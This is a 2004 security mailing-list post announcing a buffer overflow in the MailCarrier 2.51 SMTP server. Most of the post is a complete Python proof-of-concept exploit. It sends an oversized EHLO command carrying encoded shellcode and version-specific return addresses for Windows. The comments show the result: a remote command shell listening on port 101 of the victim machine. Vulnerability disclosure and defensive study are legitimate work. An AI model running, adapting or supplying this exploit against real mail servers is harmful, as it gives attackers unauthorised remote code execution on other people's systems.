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MailCarrier 2.51 SMTP server Buffer Overflow [PoC included]

Subject: MailCarrier 2.51 SMTP server Buffer Overflow [PoC included]
Date: 26 Oct 2004 16:35:50 -0000


ABOUT :

 MailCarrier is a full-featured mail server with the latest security and 
anti-spam functions. It supports SSL communication and SMTP/POP3 authentication 
methods based on SASL and NTLM that do not transmit message and/or password in 
clear text. Many spam mails can be blocked through inquiry of sender's address, 
inquiry of RBL, filtering of message content, and so on.
MailCarrier provides you with various methods for running multiple domains. It 
can execute a mail server instance per domain in a single computer; you can run 
lots of mail servers without interference each other. In addition, you can make 
many virtual domains and alias domains per mail server instance as you want. 
For each domain and instance, you can build individual spam policy and security 
policy.

http://www.tabslab.com/en/product/mailcarrier20/


THE POC :

#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow     #
# Advanced, secure and easy to use FTP Server.              #
# 23 Oct 2004 - muts                                    #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py                         #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101                          #
# localhost [127.0.0.1] 101 (hostname) open                     #
# Microsoft Windows 2000 [Version 5.00.2195]                #
# (C) Copyright 1985-2000 Microsoft Corp.                       #
# C:\WINNT\system32>                                                    #
#########################################################

import struct
import socket

print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n" 
print "\n\n###############################################"

def make_overflow_dummy(overflow_len, retaddr):
    return 'A' * overflow_len + struct.pack('<L', retaddr)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sc2 = "\xEB"
sc2 += 
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += 
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += 
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += 
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += 
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += 
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += 
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += 
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += 
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += 
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += 
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += 
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += 
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += 
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += 
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += 
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += 
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += 
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += 
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += 
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"

# Change RET address as need be.

#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2  # RET 
Win2000 SP4 ENG
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x41' * 32 + sc2  #RET WinXP 
SP2 ENG

try:
        print "\nSending evil buffer..."
        s.connect(('127.0.0.1',25))
        s.send('EHLO ' + buffer + '\r\n')
        data = s.recv(1024)
        s.close()
        print "\nDone! Try connecting to port 101 on victim machine."
except:
        print "Could not connect to SMTP!"


INFOS :

 It works as is, but you might want to change the part after the EIP to NOPs in 
the following way...just for esthetics sake:

buffer = make_overflow_dummy(5097, 0x7d17dd13) + 'x90' * 32 + sc2 #RET WinXP 
SP2 ENG



Regards to muts & the whitehat's folks
Jerome ATHIAS

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